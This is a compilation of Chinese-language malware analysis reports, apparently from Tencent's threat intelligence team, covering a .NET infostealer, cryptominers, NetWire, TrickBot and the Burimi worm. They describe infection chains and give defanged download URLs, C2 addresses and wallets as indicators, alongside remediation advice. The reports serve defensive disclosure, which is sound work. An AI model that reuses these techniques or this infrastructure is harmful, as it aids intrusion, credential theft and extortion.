.NET语言开发的程序中包含经过编译的字节码,在.NET环境中进行解释和执行,这就给样本的调试和分析带来了一定的困难。同时,.NET库中拥有丰富的工具类,在迅速搭建可用的程序方面具有一定的优势。 3、支持多类信息窃取行为 工具可以自定义生成的木马窃取的信息,包括键盘记录,截屏,剪贴板记录,以及摄像头图像。工具使用者还可以自定义记录的抓取间隔时间。 同时,工具还可以从电脑上提取还原多种登录信息缓存,包括浏览器中保存的网站帐号密码,邮件客户端中保存的密码,FTP工具、下载器中保存的密码等。 4、支持多种回传方式 工具可以自定义木马将窃取到的信息回传给木马传播者的方式,包括网络接口方式、邮件方式以及FTP方式。 在FTP方式下,工具使用者可以指定上传信息时用到的ftp地址、用户名和密码。 在邮件方式下,工具使用者可以指定邮箱服务器地址、用户名和密码。 如果使用者采用网络接口方式,则需要从工具官网下载一套完整的管理页面,并部署在自己的网站上。本次攻击中采用这种方式,使用者将chelitos.com.ve作为C&C服务器,生成的木马运行后会连接该服务器并接收相应的指令。 5、木马与服务器之间传递的指令包括: IOCs MD5 a2bf53ed2269b816d8c28e469e8c2603 adfd08c1928106a23c6ef0464885dfb9 URL http[:]//chelitos.com.ve/folders/folder/bin/trash/panel/gate.php http[:]//chelitos.com.ve/shit.exe 参考链接: https://www.freebuf.com/column/149525.html

谨防 Linux 挖矿木马通过 Kubernetes 途径入侵

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/sBiSo9fxONI60HxGnlB-Bg   近日,腾讯安全团队接受到部分用户反馈,部分Linux主机检测到名为docker的木马文件。经现场提取排查线索后,发现该挖矿木马疑似通过低版本Kubernetes组件入侵。入侵成功后在机器内执行恶意sh脚本,恶意脚本则进行同类木马清理,同时从82.146.53.166地址拉取矿机,配置后进行非法挖矿,目前看到的恶意sh脚本主要有以下2个版本。 版本一 功能结束当前机器内的其它挖矿相关模块,下载执行32/64不同版本的elf矿机程序到主机内tmp目录命名为docker,拉取矿机配置,执行矿机后删除本地矿机相关文件。 版本二 功能为结束当前机器内的其它挖矿相关模块,下载执行32/64不同版本的elf矿机程序到主机内tmp目录命名为php,拉取矿机配置,执行矿机后再删除本地矿机相关文件。该版本脚本同时增加了计划任务项,每分钟尝试执行一次sh脚本。 Tmp下名为docker或php的门罗币挖矿矿机,执行后会进行门罗币挖矿。 安全建议 1.排查清理主机root目录下,tmp目录下的docker名可疑矿机,php名可疑矿机文件; 2.排查crontab任务列表,删除异常的定时任务项; 3.查看机器内kubernetes组件,将其升级到最新版本; 4.Kubelet 外部访问配置认证授权,禁止匿名访问。 参考链接: https://cloud.tencent.com/developer/article/1549244 https://k8smeetup.github.io/docs/admin/kubelet-authentication-authorization/ https://github.com/easzlab/kubeasz/pull/192 https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c 关于Kubernetes Kubernetes是一个全新的基于容器技术的分布式架构领先方案。是Google内部集群管理系统Borg的一个开源版本。Kubernetes是一个开放的开发平台,不局限于任何一种语言,没有限定任何编程接口,是一个完备的分布式系统支撑平台。它构建在docker之上,提供应用部署、维护、扩展机制等功能,利用Kubernetes能方便地管理跨机器运行容器化的应用。 IOCs URL: hxxp://82.146.53.166/cr2.sh hxxp://82.146.53.166/xmrig_32 hxxp://82.146.53.166/p.conf hxxp://82.146.53.166/xmrig_64   MD5: 57b4ba0357815e44d8a1ac8e9c9dc7ab afb662fa877d773dafbaa47658ac176a 5110222de7330a371c83af67d46c4242

小心魔域私服客户端捆绑传播远控木马和挖矿木马

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/eBPMlCSbYM_Ql5Mky9XTAw 一、概述 近期腾讯安全威胁情报中心检测到网络游戏《魔域》私服传播挖矿木马和远程控制木马。木马首先伪装成游戏保护进程TQAT.exe随着游戏启动而执行,随后释放大灰狼远控木马DhlServer.exe,并利用远控木马的下载执行功能继续下载门罗币挖矿木马ws.exe,腾讯安全威胁情报中心将其命名为MoyuMiner。 大灰狼远控木马安装后会完全控制用户系统,上传用户文件,窃取隐私,在用户电脑下载安装其他木马,利用用户电脑做跳板攻击其他系统。而门罗币挖矿木马运行之后,会增加系统资源消耗,影响游戏软件的流畅运行。 《魔域》是网龙网络控股有限公司研发的大型网络游戏,在外网存在较多私服版本,这些私服版本游戏由于不受官方控制,容易成为病毒木马的传播渠道,截止目前MoyuMiner已感染超过5000台电脑。腾讯电脑管家和腾讯T-Sec终端安全管理系统均可查杀该病毒。 二、解决方案 针对MoyuMiner挖矿木马,腾讯系列安全软件已支持全面检测和拦截。 三、样本分析 传播大灰狼远控木马的游戏为《魔域》,并且是由私服下载的版本,官网下载的游戏安装包不包含病毒。 通过溯源分析发现,传播病毒的部分游戏文件md5和文件路径如下: 木马伪装成游戏的保护模块C:\Program Files(x86)\NetDragon\魔域-御剑天下\TQAT\TQAT.exe,随着游戏启动而运行。 TQAT.exe拷贝自身到:C:\Users\Administrator\AppData\Roaming\TQAT.exe,然后释放大灰狼远控木马到Temp目录:C:\Users\Administrator\AppData\Local\Temp\DhlServer.exe、 C:\Users\Administrator\AppData\Local\Temp\DHLDAT.exe DhlServer.exe申请内存空间,解密出大灰狼DLL文件并通过LoadLibrary加载执行。 大灰狼DLL具有标记SER-V1.8,导出3个函数:DllFuUpgStop、DllFuUpgradrs、DllEntryPoint供调用。 远控木马部分协议字段如下: 大灰狼远控木马利用下载并执行文件的功能下载挖矿木马母体http[:]//www.baihes.com:8285/ws.exe,存放至C:\Windows\SysWOW64\ws.exe。ws.exe运行后释放文件BthUdTask.exe、BthUdTask.dll,BthUdTask.exe通过写入垃圾数据增肥文件大小到超过70兆。 BthUdTask.exe解密BthUdTask.dll得到门罗币矿机程序System.exe,然后连接矿池141.255.164.28:5559挖矿 IOCs Md5 1a0f5b63b51eb71baa1b3b273edde9c9 a5532e7929a1912826772a0e221ce50f 1b6a3fa139983b69f9205aabe89d6747 418b11efdd38e3329fbb47ef27d64c14 37dff5776986eb5f6bb01c3b1df18557   Domain fujinzhuang.f3322.net linbin522.f3322.net mine.gsbean.com www.baihes.com   C2 116.202.251.12:8585 114.115.156.39:9624 43.248.188.172:30017   URL http[:]//www.baihes.com:8285/ws.exe http[:]//www.baihes.com:8282/cpa.exe

以为“订单询价”是财神到了,结果却是一个陷阱……

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/l9FMQq6i1nNopeVrF7X9Sw   一、背景 腾讯安全御见威胁情报中心检测到利用钓鱼邮件传播NetWire RAT变种木马的攻击活跃。攻击者将“订单询价”为主题的邮件发送至受害者邮箱,在附件中提供精心构造的利用Office漏洞(CVE-2017-8570)攻击的文档,存在漏洞的电脑上打开文档,会立刻触发漏洞下载NetWire RAT木马,中毒电脑即被远程控制,最终导致商业机密被盗。 NetWire是一种活跃多年的,公开的远程访问木马(RAT),该木马至少从2012年开始就被犯罪分子和APT组织使用。此次攻击中使用的NetWire变种采用MS Visual Basic编译,并且通过添加大量无关指令隐藏恶意代码。为了对抗分析,NetWire还会以调试模式启动自身为子进程并提取恶意代码注入。 NetWire RAT木马安装到受害系统后,会添加自身到系统启动项,搜集系统信息上传至服务器,然后接受控制端指令完成下载执行、搜集系统信息、搜集登录密码、记录键盘输入以及模拟鼠标键盘操作等行为。攻击者利用的Office漏洞(CVE-2017-8570)影响Office 2007至2016之间的多个版本。 NetWire攻击流程 二、详细分析 以咨询商品报价订单为主题的钓鱼邮件。 邮件附件是一个RTF文档RFQ# 19341005D.doc(默认用Word关联打开),其内容被写入了人物“John Smith”的维基百科查询返回结果。而该文档实际上包含黑客精心构造的CVE-2017-8570漏洞利用代码,该漏洞影响Office2007-Office2016之间的多个版本。存在漏洞的系统上使用Office程序打开攻击文档会触发漏洞攻击,微软已在2017年7月发布该漏洞的安全更新。 打开RTF文档后,会自动释放文档中被插入的Package对象到%temp%目录,Package对象实际上是一个恶意Scriptletfile(.sct)脚本文件。 CVE-2017-8570漏洞触发成功后会直接加载文档释放到%temp%目录下的trbatehtqevyaw.ScT脚本执行,Scriptletfile启动Powershell命令下载 http[:]//www.komstrup.com/pure/zomstag.png或http[:]//www.komstrup.com/pure/zomdost.png,保存为%Temp%\zomstag.exe或%Temp%\zomdost.exe。 zomstag.exe(zomdost.exe)是公开的远程控制木马NetWire的变种,该木马至少从2012年开始就被犯罪分子和APT组织使用,是一款商业木马。 该NetWire变种是使用MS Visual Basic编译的,并且使用了多种反分析技术来对抗分析。 添加大量无关指令隐藏恶意代码。 动态地将恶意代码提取到内存中,然后跳转到目标位置执行。 NetWire添加自身到注册表的自动运行组 <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows之中,使得当受感染的系统启动时可以自动运行。 并且创建注册表<HKCU>\SOFTWARE\NetWire、<HKCU>\SOFTWARE\NetWire\HostId、 <HKCU>\SOFTWARE\NetWire\Install Date,在其中记录受害机器ID和木马安装时间。 NetWire将自己重新启动为子进程时,使用指定的DEBUG_ONLY_THIS_PROCESS标志进行重新启动,这使得父进程充当子进程的调试器,导致其他调试器无法附加到子进程,从而阻止分析员分析恶意代码细节。然后修改子进程其内存和线程的上下文数据,在线程上下文中修改OEP值,提取NetWire的真实恶意代码并覆盖子进程中的现有代码,接着在子进程中执行该代码。 NetWire创建了一个日志文件夹,用于存储从受害者系统收集的信息的日志文件,日志文件夹位于”%AppData%\Updater”。它将记录受害者的所有键盘操作、时间以及受害者所键入内容,记录的数据被编码后保存到日志文件中。 NetWire与C&C地址45.89.175.161:3501通信,搜集计算机基本信息,包括当前登录的用户名,计算机名称,Windows版本信息,当前活动的应用程序标题,计算机的当前时间,计算机的IP地址等信息发送至控制服务器,然后等待服务器返回的指令,进行以下操作: 1、获取受害者持续处于非活动状态的时间。 2、执行下载的可执行文件,或执行现有的本地文件。 3、执行以下操作:退出NetWire进程,关闭C&C服务器的套接字,从系统注册表中的Home键读取值,重置或删除指定的注册表键,删除NetWire可执行文件并重新定位其可执行文件。 4、收集受害者系统的分区和硬盘驱动器信息,获取指定文件夹中的文件信息,通过指定的文件类型获取文件信息,创建指定的目录和文件,将内容写入指定的文件,删除、重定位特定文件,以及其他与文件相关的操作。 5、窃取并收集通过不同软件存储在受害者系统中的凭证。 重点针对以下软件:360Chrome、Opera、Mozilla Firefox、Mozilla SeaMonkey、Google Chrome、Comodo Dragon浏览器、YandexBrowser、Brave-Browser、Mozilla Thunderbird、Microsoft Outlook和Pidgin。 除此之外,还会从历史记录文件夹中读取受害者的浏览器历史记录。 6、操作该文件夹中的日志文件(%AppData%\Updater)包括枚举日志文件、获取指定的日志文件属性、读取和删除指定的日志文件。 7、获取在受害者设备上创建的窗口句柄。 8、收集受害者的计算机基本信息。 9、控制受害者的输入设备,可模拟键盘和鼠标操作。 NetWire RAT控制端界面 三、安全建议 1、及时修复Office漏洞CVE-2017-8570,参考微软官方公告: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570 2、建议不要打开不明来源的邮件附件,对于邮件附件中的文件要谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描; 3、建议升级Office系列软件到最新版本,对陌生文件中的宏代码坚决不启用;版本过低的Office、Adobe Acrobat、Flash等组件的漏洞一直是黑灰产业重点攻击目标。 4、推荐企业用户部署腾讯御点终端安全管理系统防御病毒木马攻击,个人用户启用腾讯电脑管家的安全防护功能; 5、推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 45.89.175.161 MD5 13613f57db038c20907417c1d4b32d41 750de24fff5cead08836fe36ba921351 ca1e938142b91ca2e8127f0d07958913 fe24be93ce873d53338ccaa870a18684 URL http[:]//www.komstrup.com/pure/zomdost.png http[:]//www.komstrup.com/pure/zomstag.png http[:]//www.komstrup.com/pure/zomebu.png 参考链接: https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing.html

TrickBot 银行木马传入我国,专门窃取国外银行登录凭据

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/nh-j3Zv1DTVg_xkIsjlLMQ   一、背景 腾讯安全御见威胁情报中心检测到TrickBot银行木马活跃,黑客在钓鱼文档中嵌入恶意VBA代码,宏代码通过创建和执行CMD脚本以及VBS脚本下载和传播银行木马TrickBot。监测数据显示,该木马已影响我国部分企业,中毒电脑系统信息及访问国外银行的登录信息会被窃取,受TrickBot银行木马影响较严重的地区为浙江,广东,北京等地。 TrickBot在2016年左右被发现,会在受害者通过浏览器访问在线银行时窃取网银信息,攻击目标包括澳大利亚、新西兰、德国、英国、加拿大、美国、以色列和爱尔兰等国银行系统,有国外研究者认为该组织已收集了2.5亿个电子邮箱。 TrickBot首次感染系统后,会安装计划任务“Ms visual extension”反复执行木马,然后将恶意代码注入Svchost.exe,下载多个加密的DLL模块,最终将injectdll32(64)注入浏览器进程,捕获与目标银行相关的HTTP请求并复制发送至C&C服务器。 TrickBot攻击流程 二、详细分析 当受害者打开恶意Word文档时,会显示如下图所示界面: 初次打开文档时,Office会提示是否允许宏执行,若选择允许,则文档界面中会提示一条告警消息,但是实际上后台VBA代码正在C:\Resources目录下创建5个后缀为.cmd的文件,然后通过CreateProcessA执行c:\Resources\BC4603BB450B14.cmd。 之后,BC4603BB450B14.cmd创建用于下载文件的VBS脚本pscolor.vbs, 并使用该脚本从https[:]//allpetsandpaws.com/DOYJIABZB.res或 http[:]//rygseminarios.com/egprod40.eof下载nas6.exe。 nas6.exe搜集当前系统CPUID序列号发送至https[:]//magnwnce.com/photo.png?id=,然后从http[:]//149.154.67.19/tin.exe下载Trickbot。 Trickbot重命名自身为“с그의길습을든意すスっジюл.EXE”,并拷贝到%ProgramData%和%Roaming%\swapper\目录下。重命名的文件名包含字母,韩文,中文,日文和保加利亚语,这会导致部分调试器无法加载该文件。 接着将木马安装为计划任务“Ms visual extension”,设置触发器在系统启动时木马执行一次,之后每隔11分钟执行一次。 定时任务触发后,taskeng.exe启动с그의길습을든意すスっジюл.EXE,然后将恶意代码注入子进程svchost.exe继续执行,进程树如下图所示。 TrickBot下载8个模块importDll64(或importDll32) ,injectDll64,mshareDll64,mwormDll64,networkDll64,pwgrab64,systeminfo64,tabDll64。同时下载所需配置文件存放到四个目录injectDll64_configs,networkDll64_configs,pwgrab64_configs,tabDll64_configs下。 systeminfo64负责收集受害者的系统信息,包括其Windows版本、CPU类型、RAM容量、用户帐户、已安装的软件和服务,不同信息字段以符号“aksgja8s8d8a8s97”进行分割并上传至服务器。 injectDll64最终能够将恶意代码注入Web浏览器(IE、Chrome和Firefox)从而窃取受害者的在线银行信息。被注入到svchost.exe执行时,injectDll64会枚举所有正在运行的进程,通过比较进程名来检查它是否是浏览器(包括“Chrome”、“IE”和“Firefox”浏览器)。 在选择一个进程之后,它创建一个命名管道(使用进程ID与一个常量字符串进行组合作为管道的名称),使用这个命名管道在svchost.exe和浏览器之间进行通信,以传输Sinj、dinj和dport的内容,之后InjectDll准备要注入到浏览器中的代码,并调用CreateRemoteThread执行注入。 TrickBot在一个线程中将银行信息(即Sinj、dinj和dpost的内容)传输到浏览器,之后在另一个线程中对WinInet和NSS3API的导出函数上设置钩子,从而利用注入的代码捕获来自浏览器的所有HTTP请求。 本地钩子函数能够使用银行信息对HTTP请求进行进一步的过滤,如果HTTP请求与目标银行匹配,则将该HTTP请求复制并发送到C&C服务器。 三、安全建议 中国国内在线银行系统普遍采用“U盾”来做登录认证、加密网银系统通信,TrickBot银行木马暂不能直接威胁国内网银资金安全,但对于国外银行系统的安全威胁却不容小视。腾讯安全专家建议用户采取以下安全措施,防止受害: 1、建议不要打开不明来源的邮件附件,对于邮件附件中的文件要谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描; 2、建议升级office系列软件到最新版本,对陌生文件中的宏代码坚决不启用; 3、推荐企业用户部署腾讯御点终端安全管理系统防御病毒木马攻击,个人用户启用腾讯电脑管家的安全防护功能; 4、推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统; IOCs IP 149.154.67.19 181.129.104.139 170.238.117.187 Domain allpetsandpaws.com rygseminarios.com URL https[:]//allpetsandpaws.com/DOYJIABZB.res http[:]//rygseminarios.com/egprod40.eof http[:]//149.154.67.19/tin.exe http[:]//presifered.com/data3.php md5 c04f5dc534fa5b1acef3c08d9ab3f3cb 1c132ca1ec8b89977c0e3ee28763e3fc 参考链接: https://www.fortinet.com/blog/threat-research/deep-analysis-of-the-online-banking-botnet-trickbot.html https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/(原文已被删,快照可供参考)  

快Go矿工(KuaiGoMiner)控制数万电脑挖矿,释放远控木马窃取机密

感谢腾讯御见威胁情报中心来稿! 原文:https://s.tencent.com/research/report/824.html 腾讯安全御见威胁情报中心检测到“快Go矿工”(KuaiGoMiner)挖矿木马攻击。该木马利用NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”攻击工具针对互联网上的机器进行扫描攻击,并在攻击成功后植入挖矿和远控木马,已控制数万台电脑。 一、背景 腾讯安全御见威胁情报中心检测到“快Go矿工”(KuaiGoMiner)挖矿木马攻击。该木马利用NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”攻击工具针对互联网上的机器进行扫描攻击,并在攻击成功后植入挖矿和远控木马,已控制数万台电脑。因其使用的C2域名中包含“kuai-Go”,御见威胁情报中心将其命名为“快Go矿工”(KuaiGoMiner)。 “快Go矿工”(KuaiGoMiner)将挖矿程序伪装成系统进程explorer.exe、smss.exe运行,截止目前已挖矿获得门罗币242.7个,折合人民币9万余元。同时,病毒在攻陷机器上植入的gh0st远控木马,具有搜集信息、上传下载文件、键盘记录、执行任意程序等多种功能,中毒电脑会面临机密信息泄露的风险。 据腾讯御见威胁情报中心统计数据,在微软发布“永恒之蓝”相关漏洞补丁过去两年多之后,仍有约30%用户未修复“永恒之蓝”漏洞(MS17-010),这导致利用该漏洞攻击的病毒始终层出不穷。“快Go矿工” (KuaiGoMiner)分布在全国各地,受害最严重地区为广东、江苏、河南、北京。 从“快Go矿工” (KuaiGoMiner)影响的行业来看,主要为IT行业、制造业、科研和技术服务业。 二、详细分析 漏洞攻击 “快Go矿工” (KuaiGoMiner)在攻陷的系统下载攻击模块,释放NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”漏洞攻击工具,释放到C:\Windows\Fonts\cd\目录下。 开始攻击后依次启动脚本go.vbs->rme.bat->cmd.bat,并在cmd.bat中完成机器出口IP查询、随机IP地址生成,然后通过分别针对局域网IP地址和外网随机IP地址进行445/139端口扫描。 最后在load.bat和loab.bat中针对开放445/139端口的机器进行永恒之蓝漏洞攻击。攻击成功后在目标机器执行Payload,将Doublepulsar.dll注入lsass.exe执行,将Eternalblue.dll注入explorer.exe执行。 Doublepulsar.dll或Eternalblue.dll执行后在目标机器下载m.exe或n.exe,保存至C:\safe.exe并启动,开始新一轮的感染和攻击。 挖矿 “快Go矿工”(KuaiGoMiner)下载释放挖矿模块文件到C:\Windows\Fonts\data\目录下。其中smss.exe为32位矿机程序,explorer.exe为64位矿机程序,Services.exe为Windows服务安装工具NSSM。 通过user.vbs启动user.bat。并在user.bat中删除计划任务”Flash_Update”、”Update”、”Update_windows”,删除旧服务和计划任务“Microsoft_Update”。之后判断系统版本,利用NSSM(services.exe)分别将smss.exe和explorer.exe安装服务至32位和64位系统上,使用的服务名称为“Microsoft_Update”。 矿机采用开源挖矿程序XMRig编译,挖矿使用矿池地址:xmr-eu1.nanopool.org:14444, 钱包地址: 43uXVJimpGpcoftfAfM9AGAdHwnvuSK14Uy4wVGgJB968L6M3eXn8pgFpgNSLrbpgW8Xo5bBgHxAEMxPug8knokALBrLsV4 查询矿池目前挖矿获得收益为242.7个XMR,折合人民币约91000元。 远程控制 “快Go矿工”(KuaiGoMiner)释放经gh0st修改而成的远控木马到目录 C:\Users\[User]\AppData\Local\Temp\<random>.dll下。 连接C2地址fwq.kuai-go.com:12353,根据服务器返回的指令完成搜集系统信息、上传下载文件、删除系统记录、查看系统服务、运行和退出程序、远程桌面登陆、键盘记录等远程功能。 三、安全建议 1、 快Go矿工(KuaiGoMiner)手动清除方法: 删除目录 C:\Windows\Fonts\cd\ C:\Windows\Fonts\cd\data\ 删除文件 C:\Users\[User]\AppData\Local\Temp\<random>.dll 删除计划任务“Microsoft_Update” (执行文件路径C:\Windows\Fonts\cd\data\explorer.exe 或C:\Windows\Fonts\cd\data\smss.exe) 2、针对MS010-17 “永恒之蓝”漏洞的防御: 服务器暂时关闭不必要的端口(如135、139、445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html 下载并更新Windows系统补丁,及时修复永恒之蓝系列漏洞: XP、Windows Server 2003、win8等系统访问:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598 Win7、win8.1、Windows Server 2008、Windows 10,Windows Server 2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 3、 建议企业用户部署腾讯御点终端安全管理系统防御病毒木马攻击。 4、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs MD5 339bec2b3e598b98218c16ed1e762b2a 57bd72d6dc95ff57b5321a62b9f7cde2 57003ef2a67c70f8959345f342536aa5 15d2c95fe9fe4134064e9a4f49d63cf1 20010658d789192eb69499bc5c1c9f11 546a5c41ec285686c9c082994ef193f5 830f8e648d2a7da4d512b384e29e9453 8bcf9ba698b20a6fb2fef348b8c55b1d c17f7c9c9265c4f8007d6def58174144 6dc336b2b1b4e8d5c8c5959c37b2729d 3e6c981f627122df8b428aac35cb586e 222d8a0986b8012d80edbecdc5c48714 532a0904faff2a3a8c79594c9df99320 IP 110.157.232.117 104.233.201.209 Domain w.zhzy999.net images.kuai-go.com update.kuai-go.com wx.kuai-go.com sex.kuai-go.com usa.kuai-go.com korea.kuai-go.com der.kuai-go.com fwq.kuai-go.com URL http[:]//w.zhzy999.net/images/m.exe http[:]//3.zhzy999.net/images/n.exe http[:]//images.kuai-go.com/images/logo.gif http[:]//der.kuai-go.com/img/1.rar http[:]//der.kuai-go.com/img/2.rar http[:]//110.157.232.117/images/m.exe http[:]//110.157.232.117/images/n.exe http[:]//110.157.232.117/img/1.rar http[:]//110.157.232.117/img/2.rar http[:]//110.157.232.117/img/3.rar 钱包 43uXVJimpGpcoftfAfM9AGAdHwnvuSK14Uy4wVGgJB968L6M3eXn8pgFpgNSLrbpgW8Xo5bBgHxAEMxPug8knokALBrLsV4

超3300万个邮箱密码泄露,一大波勒索邮件攻击正在到来

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/7Ed3dnY1OfXJM7M4wh0FqQ   概述 或许你可能收到过类似的邮件:“你已经感染了我的私人木马,我知道你的所有密码和隐私信息(包括隐私视频),唯一让我停下来的方式就是三天内向我支付价值900美元的比特币。” 身边不少人收到过类似的勒索邮件,收到这些邮件,表示你的部分邮箱帐号密码泄露,对方或许有也或许没有你更多的隐私信息,如果你的网盘、网络相册不幸与邮箱使用相同的密码,那就真有可能一起泄露。腾讯安全御见威胁情报中心近期捕获到一起挖矿木马攻击事件,该木马病毒的独特亮点就是利用肉鸡电脑大量发送恐吓勒索邮件。 攻击者首先通过VNC爆破弱口令尝试登录服务器,得手后先下载门罗币挖矿木马挖矿,木马会关闭Windows安全中心,添加开机启动项,会感染U盘或移动硬盘,劫持比特币钱包等等。但这些都是再平常不过的挖矿木马常规套路,该挖矿木马最大的亮点是利用被感染的服务器去分别验证数以千万计的邮箱帐号密码,再群发恐吓勒索邮件。 每攻克一台服务器,攻击者就验证2万个邮箱地址。截止目前,该病毒已经攻克了1691台服务器,已验证的邮箱帐号超过3300万个,包括Yahoo、Google、AOL、微软在内的邮件服务均在被攻击之列,最终可能会有上亿个邮箱帐号被验证。如果邮箱帐号验证成功就向该邮箱发送欺诈勒索邮件,邮件内容就是“我知道了你的密码或隐私信息,你必须在X日内向XXX帐号支付价值XXX美元的比特币,否则,就公开你的隐私信息。” 分析发现,病毒主模块编写者为“Burimi”,且具有内网传播能力(感染U盘和网络共享目录),腾讯安全专家将其命名为“Burimi”挖矿蠕虫。目前,腾讯电脑管家、腾讯御点终端安全管理系统均可查杀该病毒。 详细分析: 木马启动后尝试用内置密码列表爆破VNC服务器  爆破成功后会在目标VNC服务器下载木马程序  木马启动后连接http[:]//193.32.161.77/v.exe下载v.exe,从文件的pdb信息看作者为“Burimi”      入口处检测虚拟机以及调试器,环境不匹配就会退出。    禁用安全中心提示,减少被用户发现的概率。 拷贝自身到c:\windows[random]\win[random].exe并设置run启动项,启动项名Microsoft Windows Driver 感染U盘以及网络磁盘,写入antorun.inf 劫持剪切板钱包地址,劫持到黑客的钱包地址,目前支持BTC,XMR等 BTC已经劫持到0.14697873个 从以下域名中下载1.exe~8.exe 挖矿模块2.exe 2.exe启动后释放文件 C:\ProgramData[random]\cfg C:\ProgramData[random]\cfgi C:\ProgramData[random]\windrv32 C:\ProgramData[random]\r.vbs windrv32挖矿模块,cfg是挖矿相关配置,包括矿池和账号 r.vbs设置挖矿模块启动项 邮件勒索模块3.exe 首先访问获取任务ID(URL暂不公布),从本次监控到的ID已达1691个。   每个任务文件携带20000个邮箱账户&密码。 由此可见,入侵者掌握的邮箱帐户数量已超过3300万个,包括yahoo、Gmail、Aol、msn、hotmail等美国知名邮箱服务均受影响。病毒会根据已泄露的用户密码来验证密码正确性,一旦验证成功,就会向该邮箱发送欺诈勒索邮件,声称知道受害用户的所有密码,并限时3天缴纳价值900美元的BTC,不然就把用户的所有隐私信息公布在网上。 黑客接收BTC的钱包地址:1EwCEJr5JwpafZx11dcXDtX5QSPJvzth17,目前看已成功收到0.01BTC 安全建议 1、更换VNC连接密码为复杂密码,防止类似爆破攻击事件; 2、关闭不必要的网络文件共享、关闭计算的U盘自动播放等功能,减少中毒可能; 3、推荐使用腾讯御点或腾讯电脑管家清除“Burimi”蠕虫。 4、推测攻击者使用了已泄露的大量邮箱帐号做攻击尝试(可能远超3300万),我们建议使用yahoo、Gmail、Aol、msn、hotmail邮箱的网友,在收到勒索邮件之后,不必过度恐慌,不必支付比特币。注意更改邮箱帐号密码,启用双重验证,确保帐号安全。 也可以按以下步骤手工清理 删除文件 C:\ProgramData\FtqBnjJnmF[random]\cfg C:\ProgramData\FtqBnjJnmF[random]\cfgi C:\ProgramData\FtqBnjJnmF[random]\windrv32 C:\ProgramData\FtqBnjJnmF[random]\r.vbs c:\windows\48940040500568694\v.exe C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ftUPeSPdpA.url[random] 删除注册表项 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Driver IOCs 钱包 1EwCEJr5JwpafZx11dcXDtX5QSPJvzth17 1Gx8oRKKczwdB32yiLzVx5hsjAze6g5HHw qqax27xlp3mlj2xxvg8c907hsjl8rn2c6vvg02zqmk 24dZQuCGWPxHAo541yQ5Ry7diFui4r5PvPYw9569fHSJEZfv1uWdgtxFr6MNqj3PGR 4PGXzCGYQw7UemxRoRxCC97t7VaTr XkaCs9F83uMSNe8F42uX5VbBD9GVTSnp3D DAyF8DeCqJMJhSwKaTPfJH6FXT7jgw8Tnh 0x8b7f16faa3f835a0d3e7871a1359e45914d8c344 LWxEL2THVBbUK1hSjUf617WLRVEGR7iajp 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4g fuNBxLPc3BeMkLGaPbF5vWtANQksjQpiLQVUNjzt3UF PMtseqzh1KbDrGhzcBcXwgU3sJuWK65AJS t1YmUJ56BtdzoW5oMCxRdngdG4hJP5vKFca Domain soruuoooshfrohuo.su aoruuoooshfrohuo.su roruuoooshfrohuo.su toruuoooshfrohuo.su toruuoooshfrohuo.su uoruuoooshfrohuo.su foruuoooshfrohuo.su zeruuoooshfrohuo.su zzruuoooshfrohuo.su bbruuoooshfrohuo.su soruuoooshfrohoo.su aoruuoooshfrohoo.su roruuoooshfrohoo.su toruuoooshfrohoo.su toruuoooshfrohoo.su uoruuoooshfrohoo.su foruuoooshfrohoo.su zeruuoooshfrohoo.su zzruuoooshfrohoo.su bbruuoooshfrohoo.su soruuoooshfrohlo.su aoruuoooshfrohlo.su roruuoooshfrohlo.su toruuoooshfrohlo.su toruuoooshfrohlo.su uoruuoooshfrohlo.su foruuoooshfrohlo.su zeruuoooshfrohlo.su zzruuoooshfrohlo.su bbruuoooshfrohlo.su soruuoooshfrohfo.su aoruuoooshfrohfo.su roruuoooshfrohfo.su toruuoooshfrohfo.su toruuoooshfrohfo.su uoruuoooshfrohfo.su foruuoooshfrohfo.su zeruuoooshfrohfo.su zzruuoooshfrohfo.su bbruuoooshfrohfo.su ssofhoseuegsgrfnj.su unokaoeojoejfghr.ru osheoufhusheoghuesd.ru fafhoafouehfuh.su auoegfiaefuageudn.ru aiiaiafrzrueuedur.ru osuhughgufijfi.ru agnediuaeuidhegsf.su ouhfuosuoosrhfzr.su agnediuaeuidhegsf.su unokaoeojoejfghr.ru URL hxxp://thaus.to/1.exe hxxp://thaus.to/2.exe hxxp://thaus.to/3.exe hxxp://thaus.to/4.exe hxxp://thaus.to/5.exe hxxp://thaus.to/6.exe hxxp://thaus.to/7.exe 